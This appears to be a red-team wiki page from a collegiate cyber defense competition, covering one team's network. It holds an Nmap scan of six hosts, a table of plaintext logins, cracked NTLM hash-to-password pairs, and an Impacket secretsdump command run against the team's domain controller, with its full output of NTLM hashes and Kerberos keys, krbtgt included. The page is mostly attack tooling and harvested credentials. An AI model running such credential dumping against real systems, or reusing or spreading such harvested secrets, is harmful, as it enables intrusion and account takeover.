Team 8 Wiki Page

Signup Login
Team Information
Team MagikARP logo
Number
Team 8
Name
MagikARP
IP Range
104.190.101.0/24
Domain
team8.isucdc.com
Current Place
5th
Red Teamer(s)
None
Flag Status
Blue Flags
LTV /etc/ AD C:\Windows\System32\ JD C:\Windows\System32\ NEWS /etc/ WSTN /etc/ WWW /etc/ x-api-key-flag TX Arduino LoRa
Red Flags
WSTN /root/ WWW /root/ AD C:\Users\Administrator\ JD C:\Users\Administrator\ LTV /root/ NEWS /root/
Service Status
AD LDAP
AD RDP
JD RDP
LTV SSH
NEWS SSH
NEWS HTTP
WSTN SSH
WSTN MQTT
WWW SSH
WWW HTTP
Nmap
# Nmap 7.93 scan initiated Sat Dec  6 08:24:54 2025
Nmap scan report for ad.team8.isucdc.com (104.190.101.10)
Host is up (0.019s latency).
rDNS record for 104.190.101.10: 104-190-101-10.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   3072 23db0d4fedfbe651ecfb8af8537de343 (RSA)
|   384 1e15a74d7e619d1b725ffb9bc1e1af9b (ECDSA)
|_  256 4fed0bb743e669f8a0e80dd2ae18b5ae (ED25519)
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-12-06 14:31:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: team8.isucdc.com0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: team8.isucdc.com0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ad.team8.isucdc.com
| Not valid before: 2025-11-06T19:05:30
|_Not valid after:  2026-05-08T19:05:30
|_ssl-date: 2025-12-06T14:33:43+00:00; -30s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: TEAM8
|   NetBIOS_Domain_Name: TEAM8
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: team8.isucdc.com
|   DNS_Computer_Name: ad.team8.isucdc.com
|   DNS_Tree_Name: team8.isucdc.com
|   Product_Version: 10.0.17763
|_  System_Time: 2025-12-06T14:33:03+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49753/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -30s, deviation: 0s, median: -30s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-12-06T14:33:06
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   6.00 ms 104-190-101-10.lightspeed.sgnwmi.sbcglobal.net (104.190.101.10)

Nmap scan report for jd.team8.isucdc.com (104.190.101.20)
Host is up (0.014s latency).
rDNS record for 104.190.101.20: 104-190-101-20.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65528 filtered tcp ports (no-response)
PORT      STATE SERVICE            VERSION
22/tcp    open  ssh                OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp   open  msrpc              Microsoft Windows RPC
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=jd.team8.isucdc.com
| Not valid before: 2025-11-06T20:51:09
|_Not valid after:  2026-05-08T20:51:09
|_ssl-date: TLS randomness does not represent time
| rdp-ntlm-info: 
|   Target_Name: TEAM8
|   NetBIOS_Domain_Name: TEAM8
|   NetBIOS_Computer_Name: JD
|   DNS_Domain_Name: team8.isucdc.com
|   DNS_Computer_Name: jd.team8.isucdc.com
|   DNS_Tree_Name: team8.isucdc.com
|   Product_Version: 10.0.22621
|_  System_Time: 2025-12-06T14:33:03+00:00
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc              Microsoft Windows RPC
49673/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -31s

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   5.00 ms 104-190-101-20.lightspeed.sgnwmi.sbcglobal.net (104.190.101.20)

Nmap scan report for ltv.team8.isucdc.com (104.190.101.30)
Host is up (0.015s latency).
rDNS record for 104.190.101.30: 104-190-101-30.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 0c7c02eb5a9fe29566c11e06cf84cf47 (DSA)
|   2048 453739b58fc6b978ab1e41dd81596ecf (RSA)
|   256 89e9f14ac8d9391f078dd4603c19c4dd (ECDSA)
|_  256 58de7185954051643b9ee99cebfdf838 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): Linux 3.X|4.X (85%), Linksys embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
Aggressive OS guesses: Linksys EA3500 WAP (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
1   5.00 ms 12.110.254.254
2   7.00 ms 104-190-101-30.lightspeed.sgnwmi.sbcglobal.net (104.190.101.30)

Nmap scan report for news.team8.isucdc.com (104.190.101.40)
Host is up (0.016s latency).
rDNS record for 104.190.101.40: 104-190-101-40.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 357994a98dd506f35bb6c7317962de08 (RSA)
|   256 95a6a90f800410e48ba00b686b3907e8 (ECDSA)
|_  256 9578e1eedc0ef62ba30dddaae08fa7cd (ED25519)
123/tcp  closed ntp
389/tcp  closed ldap
8080/tcp open   http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Disposition: inline;filename=f.txt
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:31.985+00:00","status":404,"error":"Not Found","message":"","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:31.796+00:00","status":404,"error":"Not Found","message":"","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:31.813+00:00","status":404,"error":"Not Found","message":"","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 06 Dec 2025 19:03:03 GMT
|     Connection: close
|     HTTP Status 400 </div><div>|     Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}

HTTP Status 400 

|_    Request
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=12/6%Time=69343E70%P=i686-pc-windows-windows%
SF:r(GetRequest,128,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20A
SF:ccess-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers
SF:\r\nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2006\x20Dec\x20
SF:2025\x2019:03:03\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\
SF:"2025-12-06T14:31:31\.796\+00:00\",\"status\":404,\"error\":\"Not\x20Fo
SF:und\",\"message\":\"\",\"path\":\"/\"}")%r(HTTPOptions,128,"HTTP/1\.1\x
SF:20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-Control-Request-Method\
SF:r\nVary:\x20Access-Control-Request-Headers\r\nContent-Type:\x20applicat
SF:ion/json\r\nDate:\x20Sat,\x2006\x20Dec\x202025\x2019:03:03\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n{\"timestamp\":\"2025-12-06T14:31:31\.813\+00
SF::00\",\"status\":404,\"error\":\"Not\x20Found\",\"message\":\"\",\"path
SF:\":\"/\"}")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x2
SF:0text/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\
SF:x20435\r\nDate:\x20Sat,\x2006\x20Dec\x202025\x2019:03:03\x20GMT\r\nConn
SF:ection:\x20close\r\n\r\n
SF:itle>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request
SF:yle\x20type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}
SF:\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x
SF:20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-siz
SF:e:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20
SF:{height:1px;background-color:#525D76;border:none;}
SF:

HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request

SF:")%r(FourOhFourRequest,177,"HTTP/1\.1\x20404\x20\r\nVary:\x20Ori
SF:gin\r\nVary:\x20Access-Control-Request-Method\r\nVary:\x20Access-Contro
SF:l-Request-Headers\r\nContent-Disposition:\x20inline;filename=f\.txt\r\n
SF:Content-Type:\x20application/json\r\nDate:\x20Sat,\x2006\x20Dec\x202025
SF:\x2019:03:03\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"202
SF:5-12-06T14:31:31\.985\+00:00\",\"status\":404,\"error\":\"Not\x20Found\
SF:",\"message\":\"\",\"path\":\"/nice%20ports%2C/Tri%6Eity\.txt%2ebak\"}"
SF:);
Device type: general purpose|proxy server
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (87%), WebSense embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel
Aggressive OS guesses: Linux 4.15 - 5.6 (87%), Linux 5.3 - 5.4 (85%), Linux 2.6.32 (85%), Websense Content Gateway (85%), Linux 5.0 - 5.3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 123/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   6.00 ms 104-190-101-40.lightspeed.sgnwmi.sbcglobal.net (104.190.101.40)

Nmap scan report for wstn.team8.isucdc.com (104.190.101.50)
Host is up (0.0069s latency).
rDNS record for 104.190.101.50: 104-190-101-50.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE                  VERSION
22/tcp   open   ssh                      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 5a185df5ed7864cc5387404bb610863a (RSA)
|   256 e474126041a3534067eeeadac542e3fd (ECDSA)
|_  256 0799db383afe5abafc5c27c9ea83c3c5 (ED25519)
80/tcp   closed http
443/tcp  closed https
1337/tcp open   waste?
1883/tcp open   mosquitto version 2.0.11
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/clients/active: 3
|     $SYS/broker/publish/bytes/sent: 70272
|     $SYS/broker/load/connections/5min: 0.32
|     $SYS/broker/load/bytes/sent/5min: 989.19
|     $SYS/broker/load/messages/received/5min: 14.63
|     $SYS/broker/messages/stored: 38
|     $SYS/broker/load/messages/sent/15min: 16.72
|     $SYS/broker/load/bytes/received/15min: 679.90
|     $SYS/broker/publish/messages/received: 2117
|     $SYS/broker/load/publish/received/1min: 12.18
|     $SYS/broker/load/publish/received/15min: 11.99
|     $SYS/broker/messages/sent: 2747
|     TEAM_8/weather_data: \x80\x04\x95\x16\x00\x00\x00\x00\x00\x00\x00C\x12\x08af,UJ!>i_O\x04B@\x19S>Z\x94.
|     $SYS/broker/version: mosquitto version 2.0.11
|     $SYS/broker/heap/maximum: 47712
|     $SYS/broker/load/sockets/15min: 0.35
|     $SYS/broker/uptime: 22731 seconds
|     $SYS/broker/load/sockets/5min: 0.60
|     $SYS/broker/subscriptions/count: 3
|     $SYS/broker/store/messages/bytes: 204
|     $SYS/broker/store/messages/count: 38
|     $SYS/broker/retained messages/count: 42
|     $SYS/broker/publish/messages/sent: 2189
|     $SYS/broker/load/messages/sent/1min: 51.38
|     $SYS/broker/clients/connected: 3
|     $SYS/broker/load/messages/received/15min: 14.21
|     $SYS/broker/load/bytes/received/5min: 689.65
|     $SYS/broker/load/messages/sent/5min: 22.10
|     $SYS/broker/bytes/sent: 122760
|     $SYS/broker/heap/current: 47208
|     $SYS/broker/messages/received: 2677
|     $SYS/broker/load/publish/sent/15min: 14.51
|     $SYS/broker/load/sockets/1min: 1.62
|     $SYS/broker/load/publish/received/5min: 12.02
|     $SYS/broker/clients/total: 3
|     $SYS/broker/load/publish/sent/5min: 19.48
|     $SYS/broker/load/connections/1min: 1.00
|     $SYS/broker/load/bytes/sent/1min: 2135.52
|     $SYS/broker/load/connections/15min: 0.12
|     $SYS/broker/load/messages/received/1min: 16.66
|     $SYS/broker/load/bytes/sent/15min: 780.75
|     $SYS/broker/clients/maximum: 3
|     $SYS/broker/load/bytes/received/1min: 735.10
|     $SYS/broker/load/publish/sent/1min: 46.90
|     $SYS/broker/publish/bytes/received: 69861
|_    $SYS/broker/bytes/received: 119783
8080/tcp closed http-proxy
Device type: general purpose|proxy server
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (87%), WebSense embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel
Aggressive OS guesses: Linux 4.15 - 5.6 (87%), Linux 5.3 - 5.4 (86%), Linux 2.6.32 (86%), Linux 5.0 - 5.3 (86%), Websense Content Gateway (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   13.00 ms 104-190-101-50.lightspeed.sgnwmi.sbcglobal.net (104.190.101.50)

Nmap scan report for www.team8.isucdc.com (104.190.101.60)
Host is up (0.0065s latency).
rDNS record for 104.190.101.60: 104-190-101-60.lightspeed.sgnwmi.sbcglobal.net
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE                  VERSION
22/tcp   open   ssh                      OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 a06a89c7a4b137232d3aa124c3761006 (ECDSA)
|_  256 a87c353ddf2b92072b1ec85a8dd37e0f (ED25519)
80/tcp   open   http                     Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
443/tcp  closed https
445/tcp  closed microsoft-ds
1883/tcp open   mosquitto version 2.0.11
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/load/sockets/1min: 0.08
|     $SYS/broker/load/connections/1min: 0.08
|     $SYS/broker/load/bytes/sent/1min: 0.34
|     $SYS/broker/load/messages/received/1min: 0.08
|     $SYS/broker/load/messages/sent/1min: 0.08
|     $SYS/broker/version: mosquitto version 2.0.11
|     $SYS/broker/uptime: 2475586 seconds
|     $SYS/broker/load/bytes/received/1min: 1.52
|     $SYS/broker/load/bytes/sent/5min: 0.49
|     $SYS/broker/load/bytes/received/15min: 1.02
|_    $SYS/broker/load/bytes/received/5min: 2.19
8080/tcp closed http-proxy
Device type: general purpose|proxy server
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (87%), WebSense embedded (86%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel
Aggressive OS guesses: Linux 4.15 - 5.6 (87%), Linux 5.3 - 5.4 (86%), Linux 2.6.32 (86%), Websense Content Gateway (86%), Linux 5.0 - 5.3 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 104.190.101.30
2   12.00 ms 104-190-101-60.lightspeed.sgnwmi.sbcglobal.net (104.190.101.60)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  6 08:40:48 2025 -- 6 IP addresses (6 hosts up) scanned in 954.59 seconds

Notable Vulnerabilities
2025-12-06_09:05:06  nicole.galvan, dom787zov, From: 49.10.235.154
2025-12-06_09:10:06  nicole.galvan, dom787zov, From: 49.10.235.154
2025-12-06_09:15:07  alison.taylor, gag713cek, From: 49.10.235.154


Cracked NTLM
Administrator -> EMPTY PASSWORD
david.ward -> e49e5d3b4bed0ac0e8817e2541438cd7->met839buc
matthew.hansen -> 7e9b6b9f95fb64e4541c967d9e35b16c->ruz301rey
df5467758e1973b20f6028913ee9395c->mit617cus
99b52187778615e37b4c9e018f03a10d->yuq469sab
0eb573a9a6a9457dad02c93133ee4870->gag713cek
25a89ae327a61e6b8a51ef70ec3c4170->dom787zov
54dba722cd1f13561f583ca4a6ae88a6->bas122kod
2a9e645994252b382941d93d30bd1df3->bish0p
f9d5bbf2a7f6944dee88b52ce42b9117->vanoye10
44a9393a09b841a2ead5b77284968a73->dimple18
46cad2bbbe63b0c4c53839b938a50f79->Abby21
team8.isucdc.com\guthix -> bc8a032e54236604dd2d2fe4ea64fd23->jackson1231231


./secretsdump.py 'AD$'@ad.team8.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aab3fc1a7ac9d01708c3f366a4b9b31:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4b66451b9c768012803778b100077b08:::
cdc:1000:aad3b435b51404eeaad3b435b51404ee:f8224e0ad2da1cdbca24636ff95f46b4:::
david.ward:1109:aad3b435b51404eeaad3b435b51404ee:e49e5d3b4bed0ac0e8817e2541438cd7:::
matthew.hansen:1110:aad3b435b51404eeaad3b435b51404ee:7e9b6b9f95fb64e4541c967d9e35b16c:::
jeffrey.harper:1111:aad3b435b51404eeaad3b435b51404ee:df5467758e1973b20f6028913ee9395c:::
ricardo.peterson:1112:aad3b435b51404eeaad3b435b51404ee:99b52187778615e37b4c9e018f03a10d:::
alison.taylor:1113:aad3b435b51404eeaad3b435b51404ee:0eb573a9a6a9457dad02c93133ee4870:::
nicole.galvan:1114:aad3b435b51404eeaad3b435b51404ee:25a89ae327a61e6b8a51ef70ec3c4170:::
lance.hickman:1115:aad3b435b51404eeaad3b435b51404ee:54dba722cd1f13561f583ca4a6ae88a6:::
brad.chapman:1116:aad3b435b51404eeaad3b435b51404ee:2a9e645994252b382941d93d30bd1df3:::
rachel.johnson:1117:aad3b435b51404eeaad3b435b51404ee:f9d5bbf2a7f6944dee88b52ce42b9117:::
brenda.klein:1118:aad3b435b51404eeaad3b435b51404ee:44a9393a09b841a2ead5b77284968a73:::
sharon.hill:1119:aad3b435b51404eeaad3b435b51404ee:46cad2bbbe63b0c4c53839b938a50f79:::
sshd:1130:aad3b435b51404eeaad3b435b51404ee:460828786cd4f06383d3dffd305c5672:::
team8.isucdc.com\guthix:1131:aad3b435b51404eeaad3b435b51404ee:bc8a032e54236604dd2d2fe4ea64fd23:::
team8.isucdc.com\mark:1132:aad3b435b51404eeaad3b435b51404ee:6468594fe863438cd8e6dbf8b4643693:::
team8.isucdc.com\noah:1133:aad3b435b51404eeaad3b435b51404ee:a9b8c9a6462efbf7f01fba989e3a254c:::
team8.isucdc.com\duwayne:1134:aad3b435b51404eeaad3b435b51404ee:399871858d7b816a0b3a80a9c4835eed:::
AD$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NEWS$:1120:aad3b435b51404eeaad3b435b51404ee:49fad6add878edeb3f74cfcddd205b0f:::
WSTN$:1121:aad3b435b51404eeaad3b435b51404ee:ad620ea5402a0798642054543fd3b539:::
JD$:1122:aad3b435b51404eeaad3b435b51404ee:a819c952d9a7bb1043b15a5c7cad88a0:::
WWW$:1123:aad3b435b51404eeaad3b435b51404ee:91aebae74ed50c9d8f864a8ec3d72349:::
LTV$:1124:aad3b435b51404eeaad3b435b51404ee:9dc38a755accbbf104dde3c909b71844:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d42ec5b399c6e94a0b724c741f9a254e033416aca6b889f3711c13c8d426cd20
Administrator:aes128-cts-hmac-sha1-96:2b91d16e786f13f4ae1afb37391fa0d7
Administrator:des-cbc-md5:ece9df236157624a
krbtgt:aes256-cts-hmac-sha1-96:7440d74c1a59d28b5d86db1ca0cf8e239a4a18926a8f9182a13bed045443d20b
krbtgt:aes128-cts-hmac-sha1-96:6448df46293868590da38dc8ba87c398
krbtgt:des-cbc-md5:4620761f232057a8
cdc:aes256-cts-hmac-sha1-96:4217c4e79ba0fe5d05db6643b34d1822633527b805eec28d6de60abe659cf9eb
cdc:aes128-cts-hmac-sha1-96:b2c579b849094b5724c834c2eed829e1
cdc:des-cbc-md5:c7dc1c70f8dfb075
david.ward:aes256-cts-hmac-sha1-96:3952f3e113378545de561a87a0b7000c743af92605a84123ef27942caa755336
david.ward:aes128-cts-hmac-sha1-96:f13bcf2914364df87f681647bc86ad41
david.ward:des-cbc-md5:5ee585a8c8c7261c
matthew.hansen:aes256-cts-hmac-sha1-96:8896a65219858882a6f35ca590c084b57931b8e83de13e86e36d2db06086ae8e
matthew.hansen:aes128-cts-hmac-sha1-96:608d69da966b322995715a02a5db19d3
matthew.hansen:des-cbc-md5:c7b9bfd6da081cdc
jeffrey.harper:aes256-cts-hmac-sha1-96:3c8e61e97d16e866aaddb466881f272127e5b79c31cb79aae3440152a2f003e2
jeffrey.harper:aes128-cts-hmac-sha1-96:4fc381da146e47831833cf5d81d95fc6
jeffrey.harper:des-cbc-md5:a87698fe298a6179
ricardo.peterson:aes256-cts-hmac-sha1-96:eefb764dfc336732f840add2137f6b320f0d95e4af610beb31867523d93723ab
ricardo.peterson:aes128-cts-hmac-sha1-96:7f88d460c509cc1a000828f71f56d61c
ricardo.peterson:des-cbc-md5:0137f1c70252370e
alison.taylor:aes256-cts-hmac-sha1-96:6258383c36184eaa75faf3d77bf92dcc86104379484b249ac4d43fc6cee687af
alison.taylor:aes128-cts-hmac-sha1-96:16a9e5c56573eb2d2da046988fcf2509
alison.taylor:des-cbc-md5:a7b96b3d9b34c773
nicole.galvan:aes256-cts-hmac-sha1-96:c8d81237434514153793172ff21e684edef8d2922c8eff31e316d40ad3849145
nicole.galvan:aes128-cts-hmac-sha1-96:66e329ec5651546496973ab2ea8edce4
nicole.galvan:des-cbc-md5:c71a1097bf15588a
lance.hickman:aes256-cts-hmac-sha1-96:ed67a9012cbd1a5e16f710b3f9e40f8f875224ed5293510fc43457d0653e1444
lance.hickman:aes128-cts-hmac-sha1-96:510df18efc02cd88c529838922800bd5
lance.hickman:des-cbc-md5:19f76108e63e45cd
brad.chapman:aes256-cts-hmac-sha1-96:db30a3e02b4362652adf5243bfd8dfcf578149212a2981fa47df0d0569d6fb97
brad.chapman:aes128-cts-hmac-sha1-96:81e06fed50f1eaeba62f952aa3569946
brad.chapman:des-cbc-md5:d5f2b65826792326
rachel.johnson:aes256-cts-hmac-sha1-96:6428c54094730ce6f55b70abdd41e2eccb827d2477753282f69070645b1110c6
rachel.johnson:aes128-cts-hmac-sha1-96:e01575cc51e2c587d2f2fae6f9c643a1
rachel.johnson:des-cbc-md5:1ccd133e04086b92
brenda.klein:aes256-cts-hmac-sha1-96:673e1d39dea7f33bd2d0045cdaed53db0ae92c94143c3c8e807ae5cff0ed5def
brenda.klein:aes128-cts-hmac-sha1-96:623954f103b639725fd9412826d43d1c
brenda.klein:des-cbc-md5:3de30d76676d1075
sharon.hill:aes256-cts-hmac-sha1-96:e66f5db90bb2a3561e89c0d4514ebfbb0846dd9285b553e9b980440cfcaac39b
sharon.hill:aes128-cts-hmac-sha1-96:07325618dbdd2e68976f28690368dc71
sharon.hill:des-cbc-md5:34a8a883797a57a8
sshd:aes256-cts-hmac-sha1-96:b53d0014d99dcd78de626987a41df658467030491e207705a7fd72ce160859b7
sshd:aes128-cts-hmac-sha1-96:ed65e70f8ff4873c7a935d83f0e3be9b
sshd:des-cbc-md5:1362d6d91c201f2a
team8.isucdc.com\guthix:aes256-cts-hmac-sha1-96:d93631fb33c506d9ecb4e4b512be3e398805c9e767266b9733c0ec44b1782f2e
team8.isucdc.com\guthix:aes128-cts-hmac-sha1-96:ce3ec3c00483363f994edd9a11fda668
team8.isucdc.com\guthix:des-cbc-md5:baeaa8f26be389ba
team8.isucdc.com\mark:aes256-cts-hmac-sha1-96:01df0e00b6fbfa60b3a0e309a357bed4f5540df74acfaa9404efceb59c3980aa
team8.isucdc.com\mark:aes128-cts-hmac-sha1-96:c78c0dcb356ed7cf223ed19eb83de6ef
team8.isucdc.com\mark:des-cbc-md5:04296e10d5bc0e1a
team8.isucdc.com\noah:aes256-cts-hmac-sha1-96:99b3afe1b3ccaca02254a9beeb4cc8178087ac873e9a9cce781a27912b045e7d
team8.isucdc.com\noah:aes128-cts-hmac-sha1-96:d5868df2ca540c8d27158234c31fb466
team8.isucdc.com\noah:des-cbc-md5:767c1f43f120f29b
team8.isucdc.com\duwayne:aes256-cts-hmac-sha1-96:2eaf792c2805140a17b0e10c8f7fe2088f01e91f022f58c84acaa8e4c53e3d6f
team8.isucdc.com\duwayne:aes128-cts-hmac-sha1-96:35b42ef5bb3fd29fc7765825663da3a0
team8.isucdc.com\duwayne:des-cbc-md5:43cd86047f254aef
AD$:aes256-cts-hmac-sha1-96:05eee86028643f3e1591f12325a2f66e0bbaa908186161508e87e6e0e1a4150e
AD$:aes128-cts-hmac-sha1-96:486f5b09b8d8962b479ea966dcd7d616
AD$:des-cbc-md5:a446c76245f7df3d
NEWS$:aes256-cts-hmac-sha1-96:1fcd9335b15c0c65223efd9cf8b4542ebabcb68aeaec089c9aaf63cad0cfe111
NEWS$:aes128-cts-hmac-sha1-96:c150789bdce002538419f7148415d6ea
NEWS$:des-cbc-md5:fb25800152ef0ba7
WSTN$:aes256-cts-hmac-sha1-96:506a4565f768bcc8cbfeb9e49569d1ba75cda934984a3f93c06a597a6b7e7efc
WSTN$:aes128-cts-hmac-sha1-96:53a531997805572875003e6e1487b268
WSTN$:des-cbc-md5:ea7ae0e6ad37f875
JD$:aes256-cts-hmac-sha1-96:65079fcfd8ce92f338a0d5d5e9c45ad97fe6aa37087a446341a517a503020f68
JD$:aes128-cts-hmac-sha1-96:4b50b880cc8bb0d80d0f24c282c9429a
JD$:des-cbc-md5:6d3d49206d02cb07
